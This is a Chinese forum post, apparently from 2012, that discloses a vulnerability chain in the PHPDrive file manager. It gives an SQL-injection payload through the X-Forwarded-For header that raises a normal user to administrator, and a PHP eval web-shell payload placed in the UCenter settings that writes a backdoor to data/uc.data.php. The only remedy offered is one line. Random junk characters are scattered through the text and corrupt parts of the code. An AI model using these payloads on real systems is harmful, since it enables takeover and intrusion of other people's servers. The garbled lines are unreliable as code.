PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等. w' N3 T! W' ^( C9 i0 x' ]
5 S# {: h/ {% k! O( {: ^" m' ^
includes/user.lib.php
6 ?( D1 V( W; E; {. c9 J s8 T行87
1 c" e8 o$ C; F8 r) X2 |1 c0 Q# v3 R function get_ip() {. I y" a( K O* F8 p9 f
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
4 u* d% i, v9 d: V% {- b在用户注册与登录 处module/disk/account.lead.php4 l* z; _1 Q5 t0 x, X: R
198行 1 N; S' m: k4 F' x7 J( ]3 K
//更新本次登录IP和时间
+ R9 k6 [0 _& Q $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生7 @1 }. V8 L9 ]6 C" Q9 V/ n" y+ k; m
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
( F$ P5 e/ O) m6 O实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
* I0 M; V/ h3 S& m3 s# ~" K) a后台getshell:
: K0 @% V( H# r& j4 d在UCenter设置处,将UC数据库登录名填写为
4 K+ H5 }7 C6 ~+ M8 I# k: d' u
& N' o0 |: q* \2 O( d$ K' Sroot’);eval($_POST[DisKill]);?>/*
W: v$ j/ V/ h ^可以得到一个shell,位置在 data/uc.data.php
# c. C" @* y1 G' F5 x( |. Y& u1 M A E5 j1 y) o
修复:过滤注入8 J. S* L: I5 A0 B; E) I
6 t* q7 l$ o* \& w
|
发表于 2012-12-31 09:18:34
收藏
支持
反对